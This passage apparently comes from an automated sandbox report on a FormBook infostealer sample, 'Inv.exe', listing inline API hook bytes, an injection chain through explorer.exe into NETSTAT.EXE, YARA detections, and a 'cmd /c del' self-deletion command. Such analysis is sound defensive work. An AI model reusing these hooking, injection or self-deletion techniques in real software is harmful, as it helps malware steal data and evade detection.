                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Inv.exe PID: 1848 Parent PID: 5836

                                              General

                                              Start time:21:25:31
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: Inv.exe PID: 4700 Parent PID: 1848

                                              General

                                              Start time:21:25:34
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 4700

                                              General

                                              Start time:21:25:37
                                              Start date:13/01/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: autofmt.exe PID: 6448 Parent PID: 3424

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                              Imagebase:0x1080000
                                              File size:831488 bytes
                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: NETSTAT.EXE PID: 6460 Parent PID: 3424

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0x3f0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 6740 Parent PID: 6460

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 6760 Parent PID: 6740

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >